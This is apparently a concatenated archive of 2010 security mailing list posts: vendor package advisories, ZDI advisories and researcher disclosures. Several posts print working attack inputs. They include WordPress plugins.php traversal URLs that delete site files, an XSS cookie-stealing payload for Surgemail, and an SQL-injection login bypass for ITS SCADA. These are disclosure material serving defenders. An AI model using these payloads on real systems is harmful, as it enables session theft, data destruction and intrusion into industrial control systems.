Multiple vulnerabilities in WordPress 2 and 3
Hello Bugtraq! I want to warn you about Cross-Site Scripting, Full path disclosure, Information Leakage, Directory Traversal, Arbitrary File Deletion and Denial of Service vulnerabilities in WordPress. For all these attacks it's needed to have access to admin account, or to have account with rights for working with plugins. Or to attack admin or other user with required rights via XSS, to find out token which designed to protect against CSRF attacks. So users of WordPress don't need to worry much about these holes (if to not allow above-mentioned requirements). But these vulnerabilities will come in useful to security researchers at access to admin panel or at existence of XSS at the site. So it's better for WP developers to fix them. - Affected products: - Checked in WordPress 2.0.11, 2.6.2, 2.7, 2.8, 2.9.2, 3.0.1. Versions 2.0.х are not vulnerable, because they have not such functionality. Vulnerable to different vulnerabilities are WordPress 2.6 - 3.0.1 and potentially previous versions. -- Details: -- While commenting XSS vulnerability in WordPress 3.0.1 (http://www.securityfocus.com/archive/1/513250), I mentioned additional information concerning XSS vulnerability. These nuances concern and to below-mentioned vulnerabilities. It's possible to attack as via parameter checked[0], as via checked[1] and so on, and also via checked[]. In versions WP 2.7 and higher it's possible to use parameter action=delete-selected, and in versions 2.8 and higher it's also possible to use parameter action2=delete-selected. XSS (WASC-08): As I pointed out in above-mentioned letter, in WordPress 2.6.x Cross-Site Scripting attack is conducting differently. And there is almost no benefit from this XSS. For attack it's needed to send POST request to http://site/wp-admin/plugins.php with parameters _wpnonce equal token's value, delete-selected equal Delete and checked[] equal body onload=alert(document.cookie). Vulnerable are WordPress 2.6.x and potentially previous versions. Full path disclosure (WASC-13): For attack it's needed to send POST request to http://site/wp-admin/plugins.php with parameters _wpnonce equal token's value, delete-selected equal Delete and checked[] equal 1. Vulnerable are WordPress 2.6.x and potentially previous versions. Full path disclosure (WASC-13): http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722baction=delete-selectedchecked[]=1 http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722baction2=delete-selectedchecked[]=1 Vulnerable are WordPress 2.7 - 3.0.1 (for parameter action2 - 2.8 and higher). Full path disclosure (WASC-13): http://site/wp-admin/plugins.php Full path is shown at page with plugins. Vulnerable are WordPress 2.6 - 2.7.1. Information Leakage (WASC-13) + Directory Traversal (WASC-33): At page (in list under the link Click to view entire list of files which will be deleted) the list of files in current folder and subfolders is shown. In folder http://site/wp-content/plugins/: http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722baction=delete-selectedchecked[]= http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722baction2=delete-selectedchecked[]= In folder http://site/wp-content/: http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722baction=delete-selectedchecked[]=../1 http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722baction2=delete-selectedchecked[]=../1 Vulnerable are WordPress 2.7 - 3.0.1 (for parameter action2 - 2.8 and higher). And also WordPress 2.6.х. In versions 2.6.х it's needed to send appropriate POST request to http://site/wp-admin/plugins.php (as mentioned above). Arbitrary File Deletion (WASC-42) + DoS (WASC-10): If to send above-mentioned request with parameter verify-delete=1, then it's possible to delete files and folders in current folder and subfolders. Taking into account Directory Traversal it's possible to delete as all plugins, as all other files in other folders, including it's possible to conduct DoS attack on the site (if to delete important files of WP). E.g. with request checked[]=../../1 it's possible to delete the whole site. http://site/wordpress-2.9.2/wp-admin/plugins.php?_wpnonce=e0dc6c722baction=delete-selectedchecked[]=../1verify-delete=1 http://site/wordpress-2.9.2/wp-admin/plugins.php?_wpnonce=e0dc6c722baction2=delete-selectedchecked[]=../1verify-delete=1 Vulnerable are WordPress 2.7 - 3.0.1 (for parameter action2 - 2.8 and higher). And also WordPress 2.6.х. In versions 2.6.х it's needed to send appropriate POST request to http://site/wp-admin/plugins.php (as mentioned above). Timeline: 2010.08.14 - found the vulnerabilities. 2010.09.30 - disclosed at my site. As I already wrote many times to security mailing lists (http://www.securityfocus.com/archive/1/510274), starting from 2008 I never more inform WP developers about vulnerabilities in WordPress. I mentioned about these vulnerabilities at my site
NetWin Surgemail XSS vulnerability
ApplicationNetWin Surgemail 4.3e Vendor NetWin - http://netwinsite.com Discovered by Kerem Kocaer kerem.koc...@bitsec.se Problem --- Cross-site scripting (XSS) vulnerability in the Surgemail webmail login page (/surgemail) allows remote attackers to inject arbitrary web script or HTML. Input passed to the username_ex parameter is not properly sanitised before being returned to the user, therefore enabling the execution of arbitrary script code in a user's browser session, which can lead to cookie theft and session hijacking. The vulnerability is confirmed to exist in version 4.3e (latest version at the date of vulnerability discovery). Previous versions may also be vulnerable. Exploit --- http://[address]/surgeweb?username_ex=/scriscriptalert(document.cookie);/scriptinput type=hidden (tested on Firefox) Fix --- The vendor has reported fixing the problem in version 4.3g. Timeline 2010-05-13 Notified NetWin (ChrisP.) 2010-05-13 Received response from NetWin 2010-05-13 Provided details to NetWin 2010-05-26 Surgemail patched Reference - CVE Number: CVE-2010-3201
[ MDVSA-2010:191 ] mailman
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:191 http://www.mandriva.com/security/ ___ Package : mailman Date: October 1, 2010 Affected: 2008.0, 2009.0, 2009.1, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in mailman: Multiple cross-site scripting (XSS) vulnerabilities in GNU Mailman before 2.1.14rc1 allow remote authenticated users to inject arbitrary web script or HTML via vectors involving (1) the list information field or (2) the list description field (CVE-2010-3089). Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149products_id=490 The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3089 ___ Updated Packages: Mandriva Linux 2008.0: e08b1d9a020747ab70982e13a105bb48 2008.0/i586/mailman-2.1.9-2.2mdv2008.0.i586.rpm 749c76d1c7e7f4282b7ffbae1e442763 2008.0/SRPMS/mailman-2.1.9-2.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: e3bc59b996c69c2721a712ebb794921f 2008.0/x86_64/mailman-2.1.9-2.2mdv2008.0.x86_64.rpm 749c76d1c7e7f4282b7ffbae1e442763 2008.0/SRPMS/mailman-2.1.9-2.2mdv2008.0.src.rpm Mandriva Linux 2009.0: 21de029e60fc9b80988dff7898ca8658 2009.0/i586/mailman-2.1.11-1.1mdv2009.0.i586.rpm f97873131d08c4325a898ab7a715351d 2009.0/SRPMS/mailman-2.1.11-1.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 7c163192b300d72f301383c395da3b66 2009.0/x86_64/mailman-2.1.11-1.1mdv2009.0.x86_64.rpm f97873131d08c4325a898ab7a715351d 2009.0/SRPMS/mailman-2.1.11-1.1mdv2009.0.src.rpm Mandriva Linux 2009.1: 8ca5797ee931ade6c4756a044e9e9ac6 2009.1/i586/mailman-2.1.12-1.1mdv2009.1.i586.rpm 73ac7c0336096a0ee1cbf24520220c27 2009.1/SRPMS/mailman-2.1.12-1.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: f750f959be5916b1995391ccdcebb769 2009.1/x86_64/mailman-2.1.12-1.1mdv2009.1.x86_64.rpm 73ac7c0336096a0ee1cbf24520220c27 2009.1/SRPMS/mailman-2.1.12-1.1mdv2009.1.src.rpm Mandriva Linux 2010.0: a68bf17fb97f611aa5fd07edbfd25622 2010.0/i586/mailman-2.1.12-3.1mdv2010.0.i586.rpm db0d3c48e664467c204d46fb9d5d86c8 2010.0/SRPMS/mailman-2.1.12-3.1mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 32b176fd2c1f8185ae061ca48020211f 2010.0/x86_64/mailman-2.1.12-3.1mdv2010.0.x86_64.rpm db0d3c48e664467c204d46fb9d5d86c8 2010.0/SRPMS/mailman-2.1.12-3.1mdv2010.0.src.rpm Mandriva Linux 2010.1: e83ec834da21aaa9ac825b9dcca38066 2010.1/i586/mailman-2.1.13-1.1mdv2010.1.i586.rpm 23adc2d02aa602f4195d2133b86e68da 2010.1/SRPMS/mailman-2.1.13-1.1mdv2010.1.src.rpm Mandriva Linux 2010.1/X86_64: e93de69f96d208190ec865b29cd2 2010.1/x86_64/mailman-2.1.13-1.1mdv2010.1.x86_64.rpm 23adc2d02aa602f4195d2133b86e68da 2010.1/SRPMS/mailman-2.1.13-1.1mdv2010.1.src.rpm Corporate 4.0: 309605c757131162e730e8d2e77a0331 corporate/4.0/i586/mailman-2.1.6-6.4.20060mlcs4.i586.rpm 3284f4a4621bd7a6d59ffe9173787a99 corporate/4.0/SRPMS/mailman-2.1.6-6.4.20060mlcs4.src.rpm Corporate 4.0/X86_64: 28250e366a8fab9c50d8e3964d593c9b corporate/4.0/x86_64/mailman-2.1.6-6.4.20060mlcs4.x86_64.rpm 3284f4a4621bd7a6d59ffe9173787a99 corporate/4.0/SRPMS/mailman-2.1.6-6.4.20060mlcs4.src.rpm Mandriva Enterprise Server 5: 6d2706e0f8f9001a673c8141eed8638d mes5/i586/mailman-2.1.11-1.1mdvmes5.1.i586.rpm f45434df800279721a685123da24af21 mes5/SRPMS/mailman-2.1.11-1.1mdvmes5.1.src.rpm Mandriva Enterprise Server 5/X86_64: 3d512d16b23e2bd2af6d9380376dd83c mes5/x86_64/mailman-2.1.11-1.1mdvmes5.1.x86_64.rpm f45434df800279721a685123da24af21 mes5/SRPMS/mailman-2.1.11-1.1mdvmes5.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team
ZDI-10-189: Novell eDirectory Server Malformed Index Denial of Service Vulnerability
ZDI-10-189: Novell eDirectory Server Malformed Index Denial of Service Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-189 October 1, 2010 -- CVSS: 7.8, (AV:N/AC:L/Au:N/C:N/I:N/A:C) -- Affected Vendors: Novell -- Affected Products: Novell eDirectory -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9971. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to deny services on vulnerable installations of Novell eDirectory. Authentication is not required in order to trigger this vulnerability. The flaw exists within Novell's eDirectory Server's NCP implementation which binds, by default, to TCP port 524. While handling a malformed request, the application explicitly trusts a field when translating it to an index into a table of counters. If this index is too large, the application will set a value outside the array and the ndsd process will become unresponsive resulting in an inability to authenticate to that server. -- Vendor Response: Novell has issued an update to correct this vulnerability. More details can be found at: http://www.novell.com/support/viewContent.do?externalId=7006389amp;sliceId=2 -- Disclosure Timeline: 2009-04-28 - Vulnerability reported to vendor 2010-10-01 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * 1c239c43f521145fa8385d64a9c32243 -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
ZDI-10-190: Novell iManager getMultiPartParameters Arbitrary File Upload Remote Code Execution Vulnerability
ZDI-10-190: Novell iManager getMultiPartParameters Arbitrary File Upload Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-190 October 1, 2010 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Novell -- Affected Products: Novell iManager -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10293. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell iManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the nps.jar web application exposed via the Tomcat server running by default on TCP ports 8080 and 8443. The com.novell.nps.serviceProviders.PortalModuleInstallManager servlet exposes a function called getMultiPartParameters which parses POST variables from a multipart form request. The getEntry function that the above uses can be made to write an arbitrary file to disk. An attacker can abuse this to place a malicious JSP document in a web-accessible location. By uploading a malicious script, this can be leveraged to execute remote code under the context of the Tomcat process. -- Vendor Response: Novell has issued an update to correct this vulnerability. More details can be found at: http://www.novell.com/support/viewContent.do?externalId=7006515amp;sliceId=2 -- Disclosure Timeline: 2010-07-20 - Vulnerability reported to vendor 2010-10-01 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Stephen Fewer of Harmony Security (www.harmonysecurity.com) -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
Another new technique to bypass SEHOP. ( no 'xor pop pop ret' )
Lately, MS Windows SEH overflow attack technique only uses the methods. [mostly used method] win xp sp2(SEH): 'pop pop ret' - David Litchfield 2003. win xp sp3(SafeSEH): unloaded module's 'pop pop ret' - Litchfield 2003. win server 2008/Vista sp1(SEHOP): SYSDREAM(c)'s 'xor pop pop ret'. [my new method to exploit SEHOP] I researched SEH and any reference I found a way to exploit SafeSEH+SEHOP protections all at once. below is the presentation PDF. :-) Presentation URL: http://www.x90c.org/SEH%20all-at-once%20attack.pdf -- David Litchfield's 2003 presentation introduced similar method with my technique which using allowed _except_handler3. but it was applied SafeSEH only. and having a difference to my technique. -- Thnak you lists.
[ MDVSA-2010:192 ] apr-util
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:192 http://www.mandriva.com/security/ ___ Package : apr-util Date: October 2, 2010 Affected: 2008.0, 2009.0, 2009.1, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: A denial of service attack against apr_brigade_split_line() was discovered in apr-util (CVE-2010-1623). Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149products_id=490 The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1623 http://svn.apache.org/viewvc?view=revisionrevision=1003494 ___ Updated Packages: Mandriva Linux 2008.0: 0f0a7a89ae55aadde220ec2addb62ecb 2008.0/i586/apr-util-dbd-mysql-1.2.10-1.2mdv2008.0.i586.rpm 95338fe510f971933c3c8073727ce618 2008.0/i586/apr-util-dbd-pgsql-1.2.10-1.2mdv2008.0.i586.rpm 3b116b31712e8cb25843e5a5fe82bcfc 2008.0/i586/apr-util-dbd-sqlite3-1.2.10-1.2mdv2008.0.i586.rpm 37703fb6b512baf59b795530a34e2db0 2008.0/i586/libapr-util1-1.2.10-1.2mdv2008.0.i586.rpm 0c6d489de4654e52abcac77bf2525497 2008.0/i586/libapr-util-devel-1.2.10-1.2mdv2008.0.i586.rpm 31f565a4c7e40d22de0d19f6fe27947f 2008.0/SRPMS/apr-util-1.2.10-1.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 14b4f0ee8d6aa175fa9e31ea2e636644 2008.0/x86_64/apr-util-dbd-mysql-1.2.10-1.2mdv2008.0.x86_64.rpm 340d47ec560aa3c3c46c26ce4ccf7b80 2008.0/x86_64/apr-util-dbd-pgsql-1.2.10-1.2mdv2008.0.x86_64.rpm e5cb7c43589ac3e3cef57c32ed4b48f0 2008.0/x86_64/apr-util-dbd-sqlite3-1.2.10-1.2mdv2008.0.x86_64.rpm c049cdabacbbafb05fd775f8c8a4c4f0 2008.0/x86_64/lib64apr-util1-1.2.10-1.2mdv2008.0.x86_64.rpm fca193ff0018c87be501b7f1cc17f4a0 2008.0/x86_64/lib64apr-util-devel-1.2.10-1.2mdv2008.0.x86_64.rpm 31f565a4c7e40d22de0d19f6fe27947f 2008.0/SRPMS/apr-util-1.2.10-1.2mdv2008.0.src.rpm Mandriva Linux 2009.0: 0f656c156450885327bc1ebe8a3d 2009.0/i586/apr-util-dbd-freetds-1.3.4-2.4mdv2009.0.i586.rpm 0b27531d8603ef0046d1ecbd52bd066b 2009.0/i586/apr-util-dbd-ldap-1.3.4-2.4mdv2009.0.i586.rpm b953deb329e282e9581e7e313c07ed76 2009.0/i586/apr-util-dbd-mysql-1.3.4-2.4mdv2009.0.i586.rpm 447213e5c8f79056ea4feb876100dd8a 2009.0/i586/apr-util-dbd-odbc-1.3.4-2.4mdv2009.0.i586.rpm 859195910511e75007717a8215a2867d 2009.0/i586/apr-util-dbd-pgsql-1.3.4-2.4mdv2009.0.i586.rpm a30f411ba441c03f211897409056cfec 2009.0/i586/apr-util-dbd-sqlite3-1.3.4-2.4mdv2009.0.i586.rpm bc7042e923c2417424916b4af22cc011 2009.0/i586/libapr-util1-1.3.4-2.4mdv2009.0.i586.rpm cce9d4fa39e9ea354e40dbbab9bf8556 2009.0/i586/libapr-util-devel-1.3.4-2.4mdv2009.0.i586.rpm 3aff05faba17156c0c2891c840994afb 2009.0/SRPMS/apr-util-1.3.4-2.4mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: b5584a5d68829432416dd72637614313 2009.0/x86_64/apr-util-dbd-freetds-1.3.4-2.4mdv2009.0.x86_64.rpm 7512a01982585a0c13a1900d0fb5cfd0 2009.0/x86_64/apr-util-dbd-ldap-1.3.4-2.4mdv2009.0.x86_64.rpm ce1b43cee0adea7473e35dd7bb7a8a80 2009.0/x86_64/apr-util-dbd-mysql-1.3.4-2.4mdv2009.0.x86_64.rpm c669db3ca0188ff08e6d960d7caecfa6 2009.0/x86_64/apr-util-dbd-odbc-1.3.4-2.4mdv2009.0.x86_64.rpm 2dbd14c6c46263100ceb452fff4a4703 2009.0/x86_64/apr-util-dbd-pgsql-1.3.4-2.4mdv2009.0.x86_64.rpm 2b054ec7c879389f507f99d41a1fa55b 2009.0/x86_64/apr-util-dbd-sqlite3-1.3.4-2.4mdv2009.0.x86_64.rpm 2824b2b491da4991aecef5fd9b7fa68e 2009.0/x86_64/lib64apr-util1-1.3.4-2.4mdv2009.0.x86_64.rpm 776f7bd8add07ed6c441a4c79c693bcf 2009.0/x86_64/lib64apr-util-devel-1.3.4-2.4mdv2009.0.x86_64.rpm 3aff05faba17156c0c2891c840994afb 2009.0/SRPMS/apr-util-1.3.4-2.4mdv2009.0.src.rpm Mandriva Linux 2009.1: 001d390f4321be10b4939425b44dec6c 2009.1/i586/apr-util-dbd-freetds-1.3.4-9.3mdv2009.1.i586.rpm 6e0a9f8d9ce14618ab4f50100af1facf 2009.1/i586/apr-util-dbd-ldap-1.3.4-9.3mdv2009.1.i586.rpm 9360685a7758c51c691b800ec3426a40 2009.1/i586/apr-util-dbd-mysql-1.3.4-9.3mdv2009.1.i586.rpm c81ae900616ce0d7c94f455347e7d6c4 2009.1/i586/apr-util-dbd-odbc-1.3.4-9.3mdv2009.1.i586.rpm e891e8f91ce6b5a97b75747978051f65 2009.1/i586/apr-util-dbd-pgsql-1.3.4-9.3mdv2009.1.i586.rpm 743e80845e68b75df6c73f1fe6c9894f 2009.1/i586/apr-util-dbd-sqlite3-1.3.4-9.3mdv2009.1.i586.rpm fce72f37686e7a70cb98d76f471fd2cd 2009.1/i586/libapr-util1-1.3.4-9.3mdv2009.1.i586.rpm 4a610df132d46c8599bab182dd61665c 2009.1/i586/libapr-util-devel-1.3.4-9.3mdv2009.1.i586.rpm
[ MDVSA-2010:194 ] git
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:194 http://www.mandriva.com/security/ ___ Package : git Date: October 3, 2010 Affected: 2009.1, 2010.0, 2010.1, Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in git: Stack-based buffer overflow in the is_git_directory function in setup.c in Git before 1.7.2.1 allows local users to gain privileges via a long gitdir: field in a .git file in a working copy (CVE-2010-2542). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2542 ___ Updated Packages: Mandriva Linux 2009.1: e36c30bb2efd1e37a798f18b2fe0409d 2009.1/i586/git-1.6.2.5-0.2mdv2009.1.i586.rpm e24c5595f517896efc3937c3e6f67e3f 2009.1/i586/git-arch-1.6.2.5-0.2mdv2009.1.i586.rpm fb822b181161f4896ce1d6dfdeb9bd15 2009.1/i586/git-core-1.6.2.5-0.2mdv2009.1.i586.rpm 4f7f7ce2826bbca4c2686ec17dc98646 2009.1/i586/git-core-oldies-1.6.2.5-0.2mdv2009.1.i586.rpm 1de9a3c640a8ab79b0f635c7f28d3566 2009.1/i586/git-cvs-1.6.2.5-0.2mdv2009.1.i586.rpm 1a15e8c4cf5dcf67305cd82955eb9180 2009.1/i586/git-email-1.6.2.5-0.2mdv2009.1.i586.rpm bc58ceed787b7452d8a85180e44ef307 2009.1/i586/gitk-1.6.2.5-0.2mdv2009.1.i586.rpm 6a0e809737cee3fa4bd23575b6d5437a 2009.1/i586/git-svn-1.6.2.5-0.2mdv2009.1.i586.rpm 6dcf828363e99ab3dfe2b1539a095eb2 2009.1/i586/gitview-1.6.2.5-0.2mdv2009.1.i586.rpm 19f0de2a083f34955d6a85b591c8a82b 2009.1/i586/gitweb-1.6.2.5-0.2mdv2009.1.i586.rpm 729246da7e5812e3d8be48b66f6c96d2 2009.1/i586/libgit-devel-1.6.2.5-0.2mdv2009.1.i586.rpm 6fa5b0e90caeb83bad4405ca84c3a644 2009.1/i586/perl-Git-1.6.2.5-0.2mdv2009.1.i586.rpm 5c74a812d839adced666981b16008790 2009.1/SRPMS/git-1.6.2.5-0.2mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 36a163e8dbf812a00f2774737d3db3e3 2009.1/x86_64/git-1.6.2.5-0.2mdv2009.1.x86_64.rpm da62d78a1fd8cb3f148da045c98f8697 2009.1/x86_64/git-arch-1.6.2.5-0.2mdv2009.1.x86_64.rpm 8a944bf53721285cc9fe90fe80f20503 2009.1/x86_64/git-core-1.6.2.5-0.2mdv2009.1.x86_64.rpm 15ce468ebf23b2e6442da065addc0468 2009.1/x86_64/git-core-oldies-1.6.2.5-0.2mdv2009.1.x86_64.rpm e3ba618e5516ee3e0527dd4f656e43be 2009.1/x86_64/git-cvs-1.6.2.5-0.2mdv2009.1.x86_64.rpm 6be37a10302a9267d186e626437f7fba 2009.1/x86_64/git-email-1.6.2.5-0.2mdv2009.1.x86_64.rpm 3ae3179b2d6601e99e63136e70d9661e 2009.1/x86_64/gitk-1.6.2.5-0.2mdv2009.1.x86_64.rpm cc0f7c402dbd3e4fb3a89c69d7c4bbce 2009.1/x86_64/git-svn-1.6.2.5-0.2mdv2009.1.x86_64.rpm d3995ffe7fad83d902a22d7b465dad33 2009.1/x86_64/gitview-1.6.2.5-0.2mdv2009.1.x86_64.rpm 5266e7b2e209a7a94c854903f1c3dfa6 2009.1/x86_64/gitweb-1.6.2.5-0.2mdv2009.1.x86_64.rpm 0097c72a5d29c16d7193ca7159826180 2009.1/x86_64/lib64git-devel-1.6.2.5-0.2mdv2009.1.x86_64.rpm 3bf7309d7ee46a7b6c17954ddae939aa 2009.1/x86_64/perl-Git-1.6.2.5-0.2mdv2009.1.x86_64.rpm 5c74a812d839adced666981b16008790 2009.1/SRPMS/git-1.6.2.5-0.2mdv2009.1.src.rpm Mandriva Linux 2010.0: 05e69d2ef3f77fa187680647094becce 2010.0/i586/git-1.6.4.4-6.1mdv2010.0.i586.rpm 0a4073b71cf63d4edba0ff3b565a89ba 2010.0/i586/git-arch-1.6.4.4-6.1mdv2010.0.i586.rpm caea32abfe0955cc7be5be2d49a69302 2010.0/i586/git-core-1.6.4.4-6.1mdv2010.0.i586.rpm 9af8db24c9ecde83e6e30542c1a429d3 2010.0/i586/git-core-oldies-1.6.4.4-6.1mdv2010.0.i586.rpm 9db0d8344eda9b00b2bf98c78fb923c3 2010.0/i586/git-cvs-1.6.4.4-6.1mdv2010.0.i586.rpm f1075e86c19920e9d760899745d031f8 2010.0/i586/git-email-1.6.4.4-6.1mdv2010.0.i586.rpm 92457a4711ceb4c97250a78b541ed716 2010.0/i586/gitk-1.6.4.4-6.1mdv2010.0.i586.rpm 66063c99e6a26a5a4c93dbd956fd4ba3 2010.0/i586/git-prompt-1.6.4.4-6.1mdv2010.0.i586.rpm f3970194c62eccef9b32fb3cab68b55a 2010.0/i586/git-svn-1.6.4.4-6.1mdv2010.0.i586.rpm 1c17e4705d33069f1776b25531048bda 2010.0/i586/gitview-1.6.4.4-6.1mdv2010.0.i586.rpm 9d361a0c3ad75a5c68affd14dcc7681b 2010.0/i586/gitweb-1.6.4.4-6.1mdv2010.0.i586.rpm d739ac4c7012ebd56b6d401d545243fa 2010.0/i586/libgit-devel-1.6.4.4-6.1mdv2010.0.i586.rpm d288543970e5dcd2268d6a7eb60305cc 2010.0/i586/perl-Git-1.6.4.4-6.1mdv2010.0.i586.rpm 47a9c9ea741437d1432ddd90e32b45e6 2010.0/SRPMS/git-1.6.4.4-6.1mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: cc3e19b3a6cf10ead6e5a74d478fc39e 2010.0/x86_64/git-1.6.4.4-6.1mdv2010.0.x86_64.rpm 690b28356d34cc1da502f04dda722ea5 2010.0/x86_64/git-arch-1.6.4.4-6.1mdv2010.0.x86_64.rpm 848b95d3e8d2755d7e9bc885600c16b2 2010.0/x86_64/git-core-1.6.4.4-6.1mdv2010.0.x86_64.rpm 12e3fc6006f1a688da619ed304ed703f
[STANKOINFORMZASCHITA-10-02] ITS SCADA Authorization bypass
[STANKOINFORMZASCHITA-10-02] ITS SCADA Authorization bypass Authors: Eugene Salov (eug...@itdefence.ru), Andrej Komarov (koma...@itdefence.ru) Product: ITS SCADA CVSS v2 Base Score: 9.0 (AV:N/AC:L/Au:R/C:C/I:C/A:C) Impact Subscore: 10.0 Exploitability Subscore: 8.0 Availability of exploit: Yes Product description: ITS SCADA is Supervisory Control And Data Acquisition system (SCADA), which can be interfaces with various heterogeneous industrial automation equipment of Motorola MOSCAD family. Additionally, it can be installed with elements of Wonderware company products environment (Industrial SQL Server, MODBUS I/O Server). URL: http://www.itsdemo.com Vulnerability description: An unauthorized access of database fields data can be done with help of SQL-injection exploitation. Moreover, it can helps attacker to bypass authorization without any password validation. Database structure: «RTUinfo»: SiteNum, SiteType, Description; «Alarms»: EventStamp, AlarmState, TagName, Description, Operator, Provider, EventStampUTC; «BWMInfo»: RTU, SalesLocation, Description, Type, Summ; «dtproperties»: id, objectid, property, value, uvalue, version; «FlowData»: Site, iDate, DateTime, Rate, Peak, Average, Total, Lvl; «sysconstraints»: constid, id, colid, spare1, status, actions, error; «syssegments»: segment, name, status; «Users»: UID, Password, AccessLevel. Given elements of database structure contain various information about connected telemetric devices, users, occurred refusals and alarms, execution course of technological process performance. Exploitation method: User ID = 1' or 1=(select top 1 password from Users)-- Password = blank Solution: There is no available security update for now. It is highly recommended not to use default passwords for user authorization. Moreover, additionally you can use ACL lists for allowing access only from trusted hosts. Another additional mesaure of safety is using of Web Application Firewalls (WAF) and IPS/IDS systems in the area where SCADA system is located. About STC «STANKOINFORMZASCHITA»: Science Technology Center (STC) «STANKOINFORMZACHITA» is the leading information security company in Russian Federation in sphere of automation and industrial security, providing information security consulting services, information security audit, penetration testing of SCADA and industrial control systems. Contact: info (at) itdefence (dot) ru Russia, Moscow, Bolshaya Bochtovaya st., 26, Business Center Tel.: +7 (495) 790-16-60 http://itdefence.ru
[ MDVSA-2010:193 ] qt-creator
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:193 http://www.mandriva.com/security/ ___ Package : qt-creator Date: October 3, 2010 Affected: 2010.0, 2010.1 ___ Problem Description: A vulnerability has been found in Qt Creator 2.0.0 and previous versions. The vulnerability occurs because of an insecure manipulation of a Unix environment variable by the qtcreator shell script. It manifests by causing Qt or Qt Creator to attempt to load certain library names from the current working directory (CVE-2010-3374). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3374 http://qt.nokia.com/about/news/security-announcement-qt-creator-2.0.0-for-desktop-platforms ___ Updated Packages: Mandriva Linux 2010.0: 72f483e1687632ee9887b5742b72891d 2010.0/i586/libaggregation1-1.2.1-2.2mdv2010.0.i586.rpm 38ef2476d9ca746576549cd230fed498 